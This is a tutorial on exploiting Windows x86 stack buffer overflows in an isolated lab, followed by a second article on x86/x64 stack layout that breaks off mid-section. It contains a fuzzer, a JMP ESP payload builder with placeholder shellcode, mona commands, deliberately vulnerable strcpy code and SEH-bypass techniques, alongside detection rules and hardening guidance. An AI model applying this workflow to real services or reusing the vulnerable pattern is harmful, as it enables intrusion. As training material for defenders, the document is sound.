Technique | MITRE ID | Detection
Exploitation for Client Execution | T1203 | Crash telemetry (Event ID 1000), anomalous child processes (Sysmon ID 1).
Exploitation for Privilege Escalation | T1068 | Access-violation crashes in privileged services; WER buckets.
Exploit Public-Facing Application | T1190 | High-rate TCP to a service port (Sysmon ID 3); crash loops.
Exploitation for Defense Evasion | T1211 | Memory-corruption indicators; EDR memory hooks.
Exploit Protection (Mitigation) | M1050 | DEP, ASLR, CFG, /GS, SafeSEH.

Summary

  • The EIP offset is the exact byte distance from your buffer’s start to the saved return address — and a cyclic pattern finds it deterministically.
  • A De Bruijn / Metasploit pattern makes every fixed-length window unique, so the value popped into EIP maps to a single position.
  • Generate with msf-pattern_create, !mona pc, or cyclic(); resolve with msf-pattern_offset -q, !mona findmsp, or cyclic_find().
  • Verify by overwriting EIP with "BBBB" and confirming EIP = 42424242; remember little-endian display order.
  • Defenders catch the activity via Event ID 1000 (0xC0000005) crash loops and Sysmon Event ID 3 connection floods; M1050 controls (DEP, ASLR, CFG, /GS) raise the exploitation bar dramatically.

Classic Stack Buffer Overflow: Smashing the Stack on Windows

Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline — and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.


1. Windows Memory Layout Primer

Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x00000000 through 0x7FFFFFFF for user mode by default. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.

The CPU tracks two stack-relevant registers and one execution register:

  • ESP — stack pointer, the current top of stack.
  • EBP — base/frame pointer, anchors the current frame.
  • EIP — instruction pointer, the address of the next instruction. This is the attacker’s target.

A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.

x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.
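
Rather than reversing addresses by hand, let struct do it. A minimal sketch; pack_addr is a hypothetical helper name.

```python
import struct


def pack_addr(addr: int) -> bytes:
    """Pack a 32-bit address in little-endian order, as it must appear in the buffer."""
    return struct.pack("<I", addr)


print(pack_addr(0x625011AF).hex(" "))
```

The "<I" format means little-endian unsigned 32-bit, so an address that does not fit in four bytes raises struct.error instead of silently producing a wrong buffer.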


2. Anatomy of a Stack Frame

A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:

Stack Slot | Description
Function arguments | Pushed by caller before CALL
Saved EIP (return address) | Pushed implicitly by the CALL instruction
Saved EBP | Pushed by callee prologue (PUSH EBP)
/GS stack cookie (if present) | Inserted between locals and saved EBP/EIP
Local variables / buffers | Allocated by SUB ESP, N
ESP (stack top) | Grows downward

The prologue and epilogue, with the /GS cookie check shown, look like this:

; --- Prologue ---
push    ebp                 ; save caller frame pointer
mov     ebp, esp            ; establish new frame
sub     esp, 0x40           ; allocate 64 bytes of locals
mov     eax, [__security_cookie]
xor     eax, ebp            ; cookie ^= EBP (frame-tied canary)
mov     [ebp-4], eax        ; store cookie above locals

; --- Epilogue ---
mov     ecx, [ebp-4]
xor     ecx, ebp
call    __security_check_cookie  ; compare vs master; abort on mismatch
mov     esp, ebp
pop     ebp                 ; restore caller frame pointer
ret                         ; pop saved EIP into instruction pointer

Reading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.


[Figure: x86 Windows stack frame from high to low address: function arguments, saved return EIP, saved EBP, /GS cookie, local buffer, and ESP. The saved EIP sits just above the saved EBP, making it the prime overwrite target when a local buffer overflows upward.]

3. The Overflow: Why Bounds Checks Matter

The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.

Identifier | What it does
strcpy, strcat, gets, sprintf, scanf | Unsafe CRT functions with no bounds checking; classic root causes
memcpy(dst, src, count) | Copies count bytes regardless of dst size; dangerous when count is attacker-controlled

Here is the canonical vulnerable pattern defenders must recognize in code review:

#include <string.h>

// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
    char buffer[64];            // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input);  // no length check — overflow
}

When attacker_input is 64 bytes or longer, the copy (which also writes a terminating NUL) walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.
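
The effect can be reproduced without touching a real process. The following is a toy model only, assuming a frame with no /GS cookie laid out as buffer, saved EBP, saved EIP; the saved values (0x0019FF70 and 0x00401234) and the helper name simulate_copy are made up for illustration.

```python
import struct

BUF_SIZE = 64  # matches char buffer[64] in the C example

def simulate_copy(data: bytes) -> dict:
    """Model an unchecked copy into a frame laid out as
    [buffer | saved EBP | saved EIP], low address to high."""
    frame = bytearray(BUF_SIZE + 8)
    # Pretend these values were placed by CALL and the prologue.
    struct.pack_into("<II", frame, BUF_SIZE, 0x0019FF70, 0x00401234)
    # strcpy-like behaviour: copy everything plus a terminating NUL,
    # clipped only by the size of this toy model, never by BUF_SIZE.
    src = (data + b"\x00")[: len(frame)]
    frame[: len(src)] = src
    saved_ebp, saved_eip = struct.unpack_from("<II", frame, BUF_SIZE)
    return {"saved_ebp": saved_ebp, "saved_eip": saved_eip}

print({k: hex(v) for k, v in simulate_copy(b"A" * 16).items()})
print({k: hex(v) for k, v in simulate_copy(b"A" * 72).items()})
```

A 16-byte input leaves both saved values untouched, a 64-byte input already clips the low byte of the saved EBP with the terminating NUL, and a 72-byte input replaces the saved EIP with 0x41414141.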

When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.


4. Exploit Development Methodology on Windows

The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:

  1. Fuzz to crash — send increasing-length inputs until the service faults.
  2. Find the offset — send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
  3. Confirm EIP control — overwrite with a known marker (0x42424242) and verify.
  4. Enumerate bad characters — find bytes the protocol mangles (\x00, \x0a, \x0d are common).
  5. Find a trampoline — locate JMP ESP in a non-ASLR module.
  6. Build the payload — padding + trampoline address + NOP sled + shellcode.

A minimal network fuzzer:

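import socket, time

target = ("192.168.56.20", 9999)             # isolated lab VM only
size = 100
last_sent = 0
while size < 4000:
    try:
        # A timeout keeps the loop from hanging once the service stops answering.
        with socket.create_connection(target, timeout=5) as s:
            buf = b"TRUN /.:/" + b"A" * size  # protocol prefix + payload
            s.sendall(buf)
        print(f"[+] sent {size} bytes")
        last_sent = size
        size += 200
        time.sleep(1)
    except OSError:
        # The connection that fails is the one after the crashing input.
        print(f"[!] service stopped responding after the {last_sent}-byte input")
        break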

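Offset discovery with a cyclic pattern. pwntools' cyclic and !mona pattern_create generate different sequences, so look up the crash value with the same tool that produced the pattern (cyclic_find for pwntools, !mona findmsp for mona):

from pwn import cyclic, cyclic_find

pattern = cyclic(3000)                 # de Bruijn sequence over a-z
# ... send pattern, read EIP from the debugger at crash ...
eip_at_crash = 0x61616174              # illustrative value; substitute your own
offset = cyclic_find(eip_at_crash)     # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")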

Bad-character enumeration sends the full byte range and diffs it against memory:

badchar_test = bytes(b for b in range(1, 256))   # skip \x00 first
# Send, then in the debugger: d esp  -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.
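
The comparison step can be sketched as a plain byte diff. This is a minimal illustration, assuming the observed bytes have already been copied out of the debugger by hand; first_bad_byte and the sample dump are hypothetical.

```python
from typing import Optional

def first_bad_byte(sent: bytes, observed: bytes) -> Optional[int]:
    """Return the first byte of `sent` that is missing or altered in
    `observed`, or None if the whole sequence arrived intact."""
    for i, expected in enumerate(sent):
        if i >= len(observed) or observed[i] != expected:
            return expected
    return None

sent = bytes(range(1, 256))
observed = sent[:9]          # hypothetical dump: data stops right before 0x0a
bad = first_bad_byte(sent, observed)
print(hex(bad) if bad is not None else "no bad characters found")
```

Only the first mismatch is reported because everything after a truncated or mangled byte is unreliable; the usual loop is to exclude that byte, resend, and compare again.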

The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:

from pwn import p32

offset    = 2003
jmp_esp   = 0x625011AF          # FF E4 in a non-ASLR module
nop_sled  = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]"  # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32         # placeholder

payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode

The key opcodes you search modules for:

Opcode bytes | Instruction | Use
FF E4 | JMP ESP | Classic return trampoline
FF D4 | CALL ESP | Equivalent effect
FF E5 | JMP EBP | When EBP points near the buffer
EB 06 | Short JMP +6 | Next-SEH jump-over gadget

Because ESP points just past the overwritten return address once RET completes, the bytes placed immediately after that address sit at ESP; returning into JMP ESP therefore pivots execution straight into the NOP sled and shellcode.


Figure: The exploit development loop progresses from controlled crash to precise EIP hijack, terminating in a JMP ESP trampoline payload that pivots into a NOP sled and shellcode.

5. Windows Mitigations Deep-Dive

Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.

Mitigation | Mechanism | Bypass vector (teaching)
/GS (stack cookie) | Random DWORD cookie between locals and saved EBP/EIP; checked in epilogue | SEH overwrite before the cookie check; cookie leak
SafeSEH | PE table of valid SEH handlers; the exception dispatcher validates the handler before calling it | Trampoline in a module not compiled /SAFESEH
SEHOP | Validates the SEH chain reaches FinalExceptionHandler at dispatch | Chain spoofing; non-opted-in modules
DEP/NX (/NXCOMPAT) | Data pages, including the stack, are marked non-executable | ROP chain (follow-on topic)
ASLR (/DYNAMICBASE) | Randomizes image/stack/heap base | Partial overwrites, info leaks (follow-on topic)

/GS uses a per-module master cookie, initialized at startup by __security_init_cookie() and stored in the module’s .data section. The prologue XORs it with the frame pointer and stores the result on the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.

The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.
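
The cookie logic itself is small enough to model directly. The sketch below mirrors the XOR-with-EBP scheme shown in the prologue and epilogue listing earlier; the master cookie is fixed here so the example is reproducible (the real value is random), and the function names and the EBP value are assumptions made for illustration.

```python
MASK32 = 0xFFFFFFFF

def prologue_cookie(master_cookie: int, ebp: int) -> int:
    """Value the prologue stores at [ebp-4]: master cookie XOR EBP."""
    return (master_cookie ^ ebp) & MASK32

def epilogue_check(stored: int, ebp: int, master_cookie: int) -> bool:
    """True if the frame's cookie still decodes to the master cookie."""
    return ((stored ^ ebp) & MASK32) == master_cookie

master = 0x1F2E3D4C   # illustrative stand-in for __security_cookie
ebp = 0x0019FF70      # hypothetical frame pointer
stored = prologue_cookie(master, ebp)

intact = epilogue_check(stored, ebp, master)        # untouched frame
smashed = epilogue_check(0x41414141, ebp, master)   # cookie slot overwritten by 'AAAA'
print(intact, smashed)
```

A linear overflow has to write through the cookie slot to reach the saved EIP, so without knowing the stored value the check fails before RET ever runs.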


Figure: Windows layers compiler-enforced mitigations (/GS, SafeSEH) with OS-level controls (SEHOP, DEP, ASLR); each targets a distinct stage of the exploit chain.

6. SEH-Based Overflow (x86)

On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:

typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next;   // next handler in chain
    PEXCEPTION_ROUTINE                     Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler — bypassing the cookie entirely.

The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. When the dispatcher calls the handler, the third stack slot ([ESP+8]) holds a pointer to the current registration record, which begins with the Next SEH field. POP–POP–RET discards two slots and returns to that pointer, so the CPU executes the four bytes the attacker wrote into Next SEH: typically a short jump (EB 06) over the handler bytes into the shellcode.

SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (introduced with Vista SP1 and Server 2008; on by default on Server 2008 but off by default on Vista and Windows 7 clients) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.
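
The chain walk that SEHOP performs can be illustrated with a simplified model. This is a sketch in the spirit of the check, not the actual ntdll logic (which also verifies that records lie on the stack and are properly aligned); every address below, including FINAL_HANDLER, is invented for the example.

```python
FINAL_HANDLER = 0x77A1B2C3   # hypothetical address of the final handler
END_OF_CHAIN = 0xFFFFFFFF    # Next value that terminates the list

def chain_is_valid(memory: dict, head: int, max_records: int = 64) -> bool:
    """Walk {record_address: (next, handler)} and confirm the chain
    ends at the final handler."""
    addr = head
    for _ in range(max_records):
        if addr not in memory:          # Next points at unmapped or garbage data
            return False
        next_ptr, handler = memory[addr]
        if next_ptr == END_OF_CHAIN:
            return handler == FINAL_HANDLER
        addr = next_ptr
    return False                        # loop or implausibly long chain

intact = {
    0x0019FF60: (0x0019FFCC, 0x00401500),
    0x0019FFCC: (END_OF_CHAIN, FINAL_HANDLER),
}
# Same chain after an overflow replaced Next with short-jump bytes
# and Handler with some other address.
corrupted = dict(intact)
corrupted[0x0019FF60] = (0x909006EB, 0x10015A2B)

print(chain_is_valid(intact, 0x0019FF60), chain_is_valid(corrupted, 0x0019FF60))
```

Once Next SEH holds jump opcodes instead of a pointer to the next record, the walk can no longer reach the final handler, which is the property the validation relies on.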


Figure: Overwriting the SEH record and triggering an exception before the /GS epilogue runs lets attackers bypass the stack cookie entirely via a POP–POP–RET trampoline.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary

Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:

  1. No-protections build: Compile with /GS- and link with /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
  2. /GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure() — the same input that worked now dies in the epilogue.

Reference debugger and mona.py commands:

0:000> g                      ; run until crash
0:000> r                      ; read registers — expect EIP = 41414141
0:000> d esp                  ; dump stack at ESP — find your buffer
0:000> !exploitable           ; triage the crash classification
0:000> bp 0x625011AF          ; break on the JMP ESP trampoline
!mona findmsp                          ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d"   ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00"            ; generate byte array for badchar diffing

8. Common Attacker Techniques

Technique | Description
Linear stack smash | Overflow a buffer to overwrite saved EIP with a JMP ESP trampoline
SEH overwrite | Overwrite Next SEH + SE Handler, trigger an exception to bypass /GS
Non-SafeSEH trampoline | Source POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH
Bad-char-safe encoding | Encode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d)
Egghunter / staging | Use a small first-stage to locate or download a larger payload
Post-exploit VirtualProtect | Mark injected memory executable to get around DEP in legacy scenarios

In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.


9. Defensive Strategies & Detection

Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.

  • WER Event ID 1000 (Application Error, Application log): logs the faulting application and module, ExceptionCode = 0xC0000005 (access violation), the fault offset, and the faulting process ID. A 0xC0000005 in a network-facing service whose fault address lies outside any loaded module (for example a pattern-like 0x41414141) is high-fidelity.
  • WER Event ID 1001 — records the crash bucket and any captured dump.

Relevant Sysmon events for follow-on activity:

Event ID | Name | Relevance
1 | Process Creation | Shells/payloads spawned from a crashed service
3 | Network Connection | Reverse-shell / C2 egress from shellcode
7 | Image Loaded | Unexpected ws2_32.dll load by a non-network service
8 | CreateRemoteThread | Thread injection by shellcode
10 | Process Access | Shellcode calling OpenProcess on lsass.exe
11 | File Created | Dropped payloads / second-stage binaries
25 | Process Tampering | Process hollowing following the overflow

Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.

A conceptual Sigma rule keying on repeated crashes of a network-facing service:

title: Repeated Application Crash on Network-Facing Service
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    Application|contains: 'vulnservice.exe'
    ExceptionCode: '0xc0000005'
  timeframe: 1m
  condition: selection | count() by Application > 3
falsepositives:
  - Legitimate software bugs
level: medium
tags:
  - attack.initial_access
  - attack.t1190
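
The aggregation the rule describes (more than three matching crashes of one application inside a minute) can be prototyped offline before it goes into a SIEM. The sketch below is one possible sliding-window implementation; the event dictionary keys ('time', 'app', 'code') and the function name crash_burst are assumptions, not a real log schema.

```python
from datetime import datetime, timedelta

def crash_burst(events, app, threshold=3, window=timedelta(minutes=1)):
    """Return True if more than `threshold` access-violation crashes of
    `app` fall inside any sliding `window`.

    `events` is an iterable of dicts with hypothetical keys
    'time' (datetime), 'app' (str) and 'code' (str)."""
    times = sorted(
        e["time"] for e in events
        if e["app"].lower() == app.lower() and e["code"].lower() == "0xc0000005"
    )
    start = 0
    for end, t in enumerate(times):
        # Shrink the window from the left until it spans at most `window`.
        while t - times[start] > window:
            start += 1
        if end - start + 1 > threshold:
            return True
    return False

base = datetime(2024, 1, 1, 12, 0, 0)
sample = [
    {"time": base + timedelta(seconds=10 * i), "app": "vulnservice.exe", "code": "0xC0000005"}
    for i in range(4)
]
print(crash_burst(sample, "vulnservice.exe"))
```

Tuning the threshold and window against a week of baseline crash data is a reasonable way to decide whether the medium severity level holds up in a given environment.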

Hardening Steps

  1. Force WDEG / Exploit Protection on network-facing services — mandatory DEP, force-ASLR, SEHOP, heap-spray protection via Set-ProcessMitigation.
  2. Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
  3. Verify SEHOP: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
  4. Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
  5. Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
  6. Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
  7. Run services least-privilege so successful exploitation yields minimal access.

10. Tools for Stack Overflow Analysis

Tool | Description | Link
WinDbg | Kernel/user debugger; !exploitable crash triage | microsoft.com
x64dbg | User-mode debugger for live frame inspection | x64dbg.com
mona.py | Immunity/WinDbg plugin for offsets, trampolines, bad chars | github.com
pwntools | Python exploit-dev framework (cyclic, p32) | pwntools.com
ROPgadget | Gadget discovery for DEP-bypass chains | github.com
Ghidra | Static disassembly / decompilation for code review | ghidra-sre.org
Sysmon | Endpoint telemetry for post-exploitation behavior | microsoft.com

11. MITRE ATT&CK Mapping

Technique | MITRE ID | Detection
Exploit Public-Facing Application | T1190 | WER EventID 1000 crash bursts; WAF oversized-input alerts
Exploitation for Privilege Escalation | T1068 | Service running as SYSTEM crashing then spawning children
Exploitation for Client Execution | T1203 | Client app (parser/player) crash + child process via Sysmon EventID 1
Endpoint Denial of Service: Application or System Exploitation | T1499.004 | Repeated crash/restart loops (4689, WER 1000)
Exploit Protection (mitigation) | M1050 | DEP, ASLR, SEHOP, and /GS enforced via WDEG telemetry

Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.


Summary

  • A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
  • The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
  • /GS inserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
  • DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
  • Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.

Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout

Objective: Understand how the call stack is organized in x86 and x64 Windows processes — the mechanics of stack frames, function prologue/epilogue sequences, calling conventions, shadow space, and the exact memory layout a debugger reveals — so you can recognize a healthy stack versus a corrupted one and reason precisely about stack-based exploitation and its defenses.


1. Why the Stack Matters for Exploit Development

The stack is the primary battleground for classic memory-safety bugs. Saved return addresses, saved frame pointers, function arguments, and fixed-size local buffers all live side by side on the same contiguous, downward-growing region. When a write runs past the end of a stack buffer, it corrupts the very control-flow data the CPU will trust on the next RET.

For a defender, the same knowledge is diagnostic. A return address pointing into the stack or heap instead of an executable image, an RSP value that jumped thousands of bytes (a stack pivot), or a frame chain that no longer links cleanly are all signatures of corruption. You cannot recognize an abnormal stack until you have internalized a normal one.


2. The Stack as a Data Structure: Growth Direction and Address Space Layout

A Windows process virtual address space holds the mapped image (.text, .data), loaded DLLs, the heap, thread stacks, and per-thread/per-process control structures (TEB/PEB). Each thread receives its own stack, reserved and committed on demand.

The stack grows downward — toward lower addresses. PUSH decrements the stack pointer; POP increments it. The live top of the stack is always tracked by RSP (x64) / ESP (x86).

Register | Role
RSP / ESP | Stack pointer: always points to the top (lowest address) of the current frame
RBP / EBP | Base/frame pointer: anchors the frame in x86; in x64 not used for locals/args unless alloca() is used
RIP / EIP | Instruction pointer: saved as the return address by CALL
RAX | Integer/pointer return value (XMM0 for floating-point)

3. x86 Stack Frames: Registers, Calling Conventions, and the EBP Chain

32-bit Windows supports several co-existing calling conventions, which is why x86 reversing requires you to identify the convention before reading arguments.

Convention | Cleanup | Argument Passing
__cdecl | Caller cleans | Right-to-left on stack
__stdcall | Callee cleans | Right-to-left on stack (Win32 API)
__fastcall | Callee cleans | First two in ECX/EDX, rest on stack
__thiscall | Callee cleans | C++ this in ECX, args on stack

x86 code conventionally uses EBP as a fixed frame anchor. Every local and argument is addressed relative to it, and each saved EBP points at the caller’s saved EBP, forming a walkable frame chain.

// MSVC x86, compiled /Od (no optimization)
#include <string.h>

void vuln(char *src) {
    char buf[64];      // local buffer, the classic overflow target
    strcpy(buf, src);  // copy length is bounded only by src
}

; x86 frame for vuln(), high → low address
push ebp            ; save caller's EBP
mov  ebp, esp       ; EBP anchors this frame
sub  esp, 64        ; allocate buf[64]
; ... strcpy ...
; [EBP + 8]  -> arg1 (src)
; [EBP + 4]  -> return address   ← ret-overwrite target
; [EBP + 0]  -> saved EBP        ← frame chain link
; [EBP - 64] -> buf              ← overflow origin

A buffer overflow that walks upward from [EBP-64] crosses the saved EBP, then the return address — the two values the epilogue and RET consume.
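
The frame chain described above can be walked mechanically, which is essentially what a debugger's stack trace does on x86. The sketch below runs over a made-up snapshot of stack memory; the addresses, the dictionary representation, and the helper name walk_ebp_chain are all illustrative assumptions.

```python
def walk_ebp_chain(memory: dict, ebp: int, max_frames: int = 32) -> list:
    """Follow saved-EBP links through {address: dword} and return the
    return address found at [EBP+4] of each frame."""
    returns = []
    for _ in range(max_frames):
        if ebp == 0 or ebp not in memory or ebp + 4 not in memory:
            break
        returns.append(memory[ebp + 4])
        next_ebp = memory[ebp]
        if next_ebp <= ebp:      # caller frames must sit at higher addresses
            break
        ebp = next_ebp
    return returns

stack = {
    0x0019FF00: 0x0019FF40, 0x0019FF04: 0x00401050,  # vuln -> caller
    0x0019FF40: 0x0019FF80, 0x0019FF44: 0x00401120,  # caller -> main
    0x0019FF80: 0x00000000, 0x0019FF84: 0x00401300,  # outermost frame
}
healthy = walk_ebp_chain(stack, 0x0019FF00)

# The same snapshot after an overflow filled the first frame with 'A's.
smashed_stack = dict(stack)
smashed_stack[0x0019FF00] = 0x41414141
smashed_stack[0x0019FF04] = 0x41414141
smashed = walk_ebp_chain(smashed_stack, 0x0019FF00)

print([hex(a) for a in healthy], [hex(a) for a in smashed])
```

In the corrupted snapshot the walk yields a single bogus return address and then stops, because the saved EBP no longer points at a readable frame.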


Figure: A typical x86 stack frame. Overflowing the buffer at [EBP-N] walks upward through locals, corrupting saved EBP and then the return address.

4. x64 Stack Frames: The Windows ABI and Shadow Space

The Windows x64 ABI consolidates every x86 convention into a single calling convention. The first four parameters pass in registers, chosen by position: RCX, RDX, R8, R9 for integer or pointer values and XMM0–XMM3 for floating-point values. Additional arguments spill onto the stack.

Two rules dominate the x64 layout:

  • Shadow space (home space): The caller allocates 32 bytes immediately above the return address, regardless of how many parameters are actually used. The callee may dump RCX/RDX/R8/R9 into this home space if it needs to spill them.
  • 16-byte alignment: RSP must be 16-byte aligned at a CALL. Because CALL pushes an 8-byte return address, RSP is 16n-aligned immediately before the call and 16n+8 on entry to the callee.
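
Both rules combine into a small piece of arithmetic that explains the odd-looking frame sizes in x64 disassembly. The sketch below assumes RSP is 16-byte aligned immediately before each CALL (so 16n+8 on entry to the callee) and that the function pushes no registers; frame_allocation is a hypothetical helper, not a compiler API.

```python
SHADOW_SPACE = 32   # bytes the caller reserves for RCX, RDX, R8, R9
RET_ADDR = 8        # pushed by CALL

def frame_allocation(local_bytes: int, stack_arg_bytes: int = 0) -> int:
    """Smallest `sub rsp, N` that keeps RSP 16-byte aligned at the
    function's own CALL sites, assuming no pushed registers."""
    needed = SHADOW_SPACE + stack_arg_bytes + local_bytes
    # On entry RSP is 16n+8, so N plus the return address must be a
    # multiple of 16.
    total = needed + RET_ADDR
    padded = (total + 15) // 16 * 16
    return padded - RET_ADDR

for local_bytes in (0, 8, 16, 24):
    print(local_bytes, hex(frame_allocation(local_bytes)))
```

With no locals the result is 0x28: 32 bytes of shadow space for the function's own callees plus 8 bytes of padding to restore alignment.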

Critically, x64 functions typically address locals and arguments RSP-relative, leaving RSP constant for the body of the function. RBP is freed for general use unless alloca() is present.

[High address — caller's frame]
  Stack arg 5+      ← [RSP + 0x28+]
  Shadow [R9]       ← [RSP + 0x20]
  Shadow [R8]       ← [RSP + 0x18]
  Shadow [RDX]      ← [RSP + 0x10]
  Shadow [RCX]      ← [RSP + 0x08]   (relative to callee entry)
  Return Address    ← [RSP + 0x00]   ← ret-overwrite target
  Local variables   ← [RSP - N]
[Low address — grows downward]

Figure: The x64 Windows ABI reserves 32 bytes of shadow space above the return address; RSP remains constant through the function body for RSP-relative addressing.

5. Volatile vs. Non-Volatile Registers and Leaf Functions

The x64 convention splits the register file into volatile (caller-saved) and non-volatile (callee-saved). A function that clobbers a non-volatile register must save and restore it in its prologue/epilogue.

Class | Registers
Volatile (caller-saved) | RAX, RCX, RDX, R8–R11, XMM0–XMM5
Non-volatile (callee-saved) | RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15

A leaf function changes no non-volatile register (including not altering RSP by calling out). A non-leaf function calls another function — which adjusts RSP — and therefore must establish a frame and register unwind data. This distinction drives whether the compiler emits a prologue and .pdata entry at all.


6. Prologue and Epilogue Deep Dive

The prologue establishes the frame: save callee-saved registers and reserve local space. The epilogue reverses it and returns.

; x86 epilogue
mov  esp, ebp      ; free locals
pop  ebp           ; restore caller's EBP
ret                ; pop return address → EIP

LEAVE is a single instruction equivalent to mov esp, ebp + pop ebp, available on both x86 and x64.

; x64 MASM (ml64) non-leaf frame
sub  rsp, 0x28     ; 0x20 shadow + 8 align pad
; ... body uses [rsp+0x..] for locals/spills ...
add  rsp, 0x28     ; deallocate
ret                ; pop return address → RIP

Many optimized x64 functions omit push rbp entirely and address everything from RSP. Frame Pointer Omission (FPO) saves two instructions and frees RBP as a general register; GCC/Clang do this by default at -O2, and MSVC does similarly with /O2. For exploitation this matters: without a frame pointer there is no [EBP+4] anchor for the return address — offsets must be computed from RSP at a known instruction.

__declspec(noinline) int callee(int a, int b, int c, int d) {
    int local = a + b + c + d;   // forces a real frame + homing
    return local;
}
int caller(void) { return callee(1, 2, 3, 4); }

Compile this on Godbolt or step it in WinDbg to watch RCX/RDX/R8/R9 home into shadow space.


7. Unwind Data and Structured Exception Handling

x64 Windows requires every non-leaf function to register unwind data in the PE .pdata and .xdata sections so the OS can walk frames during structured exception handling. Each function publishes a RUNTIME_FUNCTION and an associated UNWIND_INFO that describes the prologue.

typedef struct _RUNTIME_FUNCTION {
    ULONG BeginAddress;
    ULONG EndAddress;
    ULONG UnwindData;   // RVA to UNWIND_INFO
} RUNTIME_FUNCTION, *PRUNTIME_FUNCTION;

